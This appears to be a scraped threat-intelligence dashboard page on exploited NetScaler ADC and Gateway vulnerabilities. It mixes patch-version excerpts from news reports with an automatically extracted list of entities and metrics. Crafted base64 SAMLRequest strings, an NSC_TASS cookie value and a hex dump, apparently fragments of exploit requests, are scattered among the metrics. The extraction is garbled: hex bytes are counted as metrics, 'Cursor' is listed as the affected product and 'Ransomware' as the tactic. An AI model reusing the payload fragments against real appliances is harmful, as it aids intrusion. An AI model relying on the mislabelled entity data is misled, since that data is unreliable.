Metrics
data_breach
0
Yxnkzgbjrd0Mymluzd1Wb3N0Jkfdu1Vstd3Wdzdvvq3Epsiyljaicmlkpsixmsikqxnzzxj0Aw9Uq29Uc3Vtzxjtzxj2Awnlvvjmpsiymilvvq3Ebxbszs5Jb20Vzgvtbzevaw5Kzxgucghwpc9Zyw1Soklzc3Vlcga=
NSC_TASS=YXNkZgBJRD0mYmluZD1wb3N0JkFDU1VSTD3wDZDvvq3ePSIyLjAiCmlkPSIxMSIKQXNzZXJ0aW9uQ29uc3VtZXJTZXJ2aWNlVVJMPSIyMiLvvq3ebXBsZS5jb20vZGVtbzEvaW5kZXgucGhwPC9zYW1sOklzc3VlcgA=
And decoded…:
00000000 61 73 64 66 00 49 44 3d 26 62 69 6e 64 3d 70 6f…
Metrics
infrastructure
14.1-72
Software Version
Related:
NIST Enrichment Reductions Impact CVE Coverage, Accuracy
Lupovis urged organizations to immediately upgrade to fixed versions of NetScaler ADC and Gateway, v. 14.1-72.61 or 13.1-63.18.
…Patches for the security defects have been released in the following versions -
NetScaler ADC and NetScaler Gateway 14.1-72.61 and later releases
NetScaler ADC and NetScaler Gateway 13.1-63.18 and later releases of 13.1
NetScaler ADC 14…
Metrics
infrastructure
13.1-63
Software Version
Related:
NIST Enrichment Reductions Impact CVE Coverage, Accuracy
Lupovis urged organizations to immediately upgrade to fixed versions of NetScaler ADC and Gateway, v. 14.1-72.61 or 13.1-63.18.
…wing versions -
NetScaler ADC and NetScaler Gateway 14.1-72.61 and later releases
NetScaler ADC and NetScaler Gateway 13.1-63.18 and later releases of 13.1
NetScaler ADC 14.1-FIPS 14.1-72.61 FIPS and later releases of 14.1-FIPS
NetScaler…
Metrics
infrastructure
13.1
Software Version
…wing versions -
NetScaler ADC and NetScaler Gateway 14.1-72.61 and later releases
NetScaler ADC and NetScaler Gateway 13.1-63.18 and later releases of 13.1
NetScaler ADC 14.1-FIPS 14.1-72.61 FIPS and later releases of 14.1-FIPS
NetScaler…
Metrics
infrastructure
14.1-FIPS
Software Version
…y 14.1-72.61 and later releases
NetScaler ADC and NetScaler Gateway 13.1-63.18 and later releases of 13.1
NetScaler ADC 14.1-FIPS 14.1-72.61 FIPS and later releases of 14.1-FIPS
NetScaler ADC 13.1-FIPS and 13.1-NDcPP 13.1.37.272 and later rel…
Metrics
infrastructure
13.1-FIPS
Software Version
…-63.18 and later releases of 13.1
NetScaler ADC 14.1-FIPS 14.1-72.61 FIPS and later releases of 14.1-FIPS
NetScaler ADC 13.1-FIPS and 13.1-NDcPP 13.1.37.272 and later releases of 13.1-FIPS and 13.1-NDcPP
As for CVE-2026-13474, customers are…
Metrics
infrastructure
13.1-NDcPP
Software Version
…er releases of 13.1
NetScaler ADC 14.1-FIPS 14.1-72.61 FIPS and later releases of 14.1-FIPS
NetScaler ADC 13.1-FIPS and 13.1-NDcPP 13.1.37.272 and later releases of 13.1-FIPS and 13.1-NDcPP
As for CVE-2026-13474, customers are also advised…
Metrics
infrastructure
13.1.37
Software Version
…of 13.1
NetScaler ADC 14.1-FIPS 14.1-72.61 FIPS and later releases of 14.1-FIPS
NetScaler ADC 13.1-FIPS and 13.1-NDcPP 13.1.37.272 and later releases of 13.1-FIPS and 13.1-NDcPP
As for CVE-2026-13474, customers are also advised to update t…
Metrics
infrastructure
9.3
Software Version
…leased alongside Citrix's bulletin, said CVE-2026-8451 was discovered and reported in late March 2026 after attempts to reproduce
CVE-2026-3055
(CVSS score: 9.3), a separate insufficient input validation flaw that was disclosed earlier this year.
Intelligence Sources
The Hacker News
2026-07-01
Zero Day Fans
2026-06-30
CyberScoop
2026-06-30
Dark Reading
2026-07-06
Unpublish from Social Media?
Are you sure you want to delete this podcast video from all synchronized social networks (YouTube, Facebook, Threads)?
Important:
Due to Meta API restrictions, Instagram Reels cannot be deleted automatically via API by third-party apps.
View Profile to Delete Manually
View Profile to Delete Manually
Tactical Intelligence
Report Intelligence Issue
Podcast Options
Generate
Incident Version History
CURRENT VERSION
Last Updated: 2026-07-23T06:02
Comprehensive Tactical Telemetry
Highly Correlated Entities
60x
organisation
Identified Entity
Secure By Design
entity
41x
timeline
Temporal Reference
2026/06/30
date
11x
infrastructure
Software Version
2.0
version
7x
vulnerability
Exploited CVE
CVE-2026-8451
cve
4x
general metric
4C
20
4c
4x
general metric
3D
69
3d
3x
tactic
MITRE ATT&CK Technique
T1588.006 - Vulnerabilities
technique
2x
industry
Targeted Sector
Defense
sector
2x
general metric
Samlrequest
190
samlrequest
2x
general metric
Netscaler Gateway
14
netscaler gateway
2x
general metric
6D
73
6d
2x
general metric
= Po| 4C
74
= po| 4c
2x
general metric
|Assertionconsume|
65
|assertionconsume|
2x
general metric
Score
7
score
2x
attribution
Attributing Entity
KEV
authority
Contextual Telemetry
Context Block
31 METRICS
target region
Target Country
United States
country
general metric
Cve-2026
8,451
cve-2026
infrastructure
Affected Product
Cursor
software
infrastructure
Skip Leading Whitespace
28
skip leading whitespace
general metric
Contents
302
contents
general metric
Nov-1999
9
nov-1999
general metric
Protection
1
protection
general metric
Cache Control
398
cache control
general metric
Samlrequest Phnhbwxwokf1Dghuumvxdwvzdcbwzxjzaw9Upsiyljaiiefzc2Vydglvbknvbnn1Bwvyu2Vydmljzvvstd0Kawq9Cjxzyw1Soklzc3Vlcj53Yxrjahrvd3I8L3Nhbww6Sxnzdwvypgo8L3Nhbwxwokf1Dghuumvxdwvzdd4=
180
samlrequest phnhbwxwokf1dghuumvxdwvzdcbwzxjzaw9upsiyljaiiefzc2vydglvbknvbnn1bwvyu2vydmljzvvstd0kawq9cjxzyw1soklzc3vlcj53yxrjahrvd3i8l3nhbww6sxnzdwvypgo8l3nhbwxwokf1dghuumvxdwvzdd4=
general metric
Value
22
value
general metric
|O1
61
|o1
general metric
F0
0
f0
financial
Netscaler Adc
14
netscaler adc
infrastructure
Netscaler Adc Fips
13
netscaler adc fips
infrastructure
Fips Netscaler
14
fips netscaler
general metric
|Asdf
49
|asdf
general metric
|Suer&Bind
41
|suer&bind
data breach
Yxnkzgbjrd0Mymluzd1Wb3N0Jkfdu1Vstd3Wdzdvvq3Epsiyljaicmlkpsixmsikqxnzzxj0Aw9Uq29Uc3Vtzxjtzxj2Awnlvvjmpsiymilvvq3Ebxbszs5Jb20Vzgvtbzevaw5Kzxgucghwpc9Zyw1Soklzc3Vlcga=
0
yxnkzgbjrd0mymluzd1wb3n0jkfdu1vstd3wdzdvvq3epsiyljaicmlkpsixmsikqxnzzxj0aw9uq29uc3vtzxjtzxj2awnlvvjmpsiymilvvq3ebxbszs5jb20vzgvtbzevaw5kzxgucghwpc9zyw1soklzc3vlcga=
general metric
Ef
90
ef
general metric
0A
30
0a
general metric
6E
75
6e
general metric
|Rserviceurl="22"|
50
|rserviceurl="22"|
general metric
6F
63
6f
general metric
Id=22
11
id=22
general metric
Ed
40
ed
vulnerability
CVSS Score
9
score
general metric
Hours
24
hours
tactic
Cyber Operation Type
Ransomware
tactic
general metric
Vulnerabilities
9
vulnerabilities
general metric
Dns Proxy
8
dns proxy
general metric
Service
9
service
Click on any entity below to view its context in the main text!
Selective Unpublish
Selecciona las redes de las que quieres eliminar esta publicación. El sistema intentará borrar el post real de la API y limpiará la base de datos para que puedas volver a lanzarlo.
By navigating this website, you accept the use of strictly necessary technical cookies for session security and basic platform functionality. We do not use tracking or advertising cookies.
Read our Privacy Policy.